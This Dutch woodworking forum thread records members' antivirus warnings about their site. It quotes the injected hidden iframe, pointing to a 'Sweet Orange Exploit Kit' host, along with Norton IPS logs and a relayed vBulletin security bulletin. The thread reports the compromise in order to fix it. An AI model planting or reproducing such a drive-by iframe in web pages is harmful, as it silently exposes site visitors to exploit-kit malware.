Welkom bij www.woodworking.nl.
Pagina 1 van de 4 123 ... LaatsteLaatste
Resultaten 1 tot 10 van de 36

Onderwerp: Virusscanner

Senior Member
    Ingeschreven
    Mar 2013

Virusscanner

Mijn virusscanner is het niet eens met deze regel in de broncode van 'onze' website

<iframesrc="http://deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217"width="0"height="0"></iframe>

Ik kan er op google niets over vinden, maar wel raar, nooit eerder last van gehad.

Norton geeft bij mij Categorie: Inbraakpreventie
    Datum en tijd,Risico,Activiteit,Status,Aanbevolen actie,Naam van IPS-waarschuwing,Standaardactie,Ondernomen actie,Aanvallende computer,URL van aanvaller,Doeladres,Bronadres,Verkeersbeschrijving
    3-9-2013 21:23:17,Hoog,Inbraakpoging van deniedatomtoms.biz geblokkeerd.,Geblokkeerd,Geen actie vereist,Web Attack: Sweet Orange Exploit Kit Website,Geen actie vereist,Geen actie vereist,"deniedatomtoms.biz (95.163.121.138, 41991)",deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217,"GEBRUIKER-HP (192.168.1.114, 51711)",95.163.121.138 (95.163.121.138),"TCP, Poort 41991"
    Netwerkverkeer van <b>deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217</b> komt overeen met de handtekening van een bekende aanval. De aanval was het resultaat van \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE. Klik op <b>Mij niet meer waarschuwen</b> in het venster <b>Acties</b> als u niet meer gewaarschuwd wilt worden voor dit type verkeer.

Ik heb hetzelfde: Ook met Norton

Categorie: Inbraakpreventie
    Datum en tijd,Risico,Activiteit,Status,Aanbevolen actie,Naam van IPS-waarschuwing,Standaardactie,Ondernomen actie,Aanvallende computer,URL van aanvaller,Doeladres,Bronadres,Verkeersbeschrijving
    3-9-2013 21:25:05,Hoog,Inbraakpoging van deniedatomtoms.biz geblokkeerd.,Geblokkeerd,Geen actie vereist,Web Attack: Sweet Orange Exploit Kit Website,Geen actie vereist,Geen actie vereist,"deniedatomtoms.biz (95.163.121.138, 41991)",deniedatomtoms.biz:41991/plugins/javascript/view.php?join=217," enz.........

mijn AVG geeft ook steeds een pop-up, en gisteren was er een link uit roemenie die de boel liet afgaan

Inderdaad, vandaag deniedatomtoms.biz en gisteren een link uit Roemenie. Ik vermoed dat de server besmet is...

Vandaag bij elk bezoek van woodworking krijg ik een pop up melding dat;
    Norton heeft een aanval geblokkeerd van Web Attack Sweet Orange Exploit KIT

Beste forummers, ook per pb al een reactie gekregen. Wat ik er nu van weet is, dat het een brak stukje java software is in de installatie directory. Zonder direct alles over hoop te halen, heeft het mijn aandacht. Wordt spoedig vervolgd......

jaap

Krijg net de onderstaande mail, heb de actie uitgevoerd, nu even wachten.

jaap

-----------------------------------------

vBulletin Security eBulletin
    http://www.vbulletin.com/
    September 3rd, 2013

* vBulletin 4.1.x & 5.0.x Security Issue
    * Your License Information
    * Contact Us

------ vBulletin 4.1.x & 5.0.x Security Issue ------

A potential exploit vector has been found in the vBulletin 4.1+ and 5.0+ installation directories. Our developers are investigating this issue at this time. If deemed necessary we will release the necessary patches. In order to prevent this issue on your vBulletin sites, you should delete the install directory for your installation. This folder is not required for normal operation of vBulletin.

The directories that should be deleted are:

4.x - /install/

5.x - /core/install

On vB5, make sure you delete only the install folder, not the core folder.
    After deleting these directories your sites can not be affected by the issues we’re currently investigating.

vBulletin 3.x would not be affected by these issues. However if you want the best security precautions, you should delete your install directory as well.

The Support forum thread on this topic can be found here - http://www.vbulletin.com/forum/forum...-1-vbulletin-5

Nog steeds de popup.

Senior Member
    Ingeschreven
    Jul 2011
    Sinds gisteren krijg ik ook steeds popups met waarschuwingen.

Melding AVG-01.jpg
    Melding AVG-02.jpg

Na de eerste twee meldingen java opnieuw geinstalleerd (zou de oplossing moeten zijn)
    Melding na install Java-01.jpg
    Melding na install Java-02.jpg

Daarna komen deze 2 meldingen heel irritant om de haverklap op het scherm.
    Waar gehakt wordt, vallen spaanders, mvg .

Forum Rechten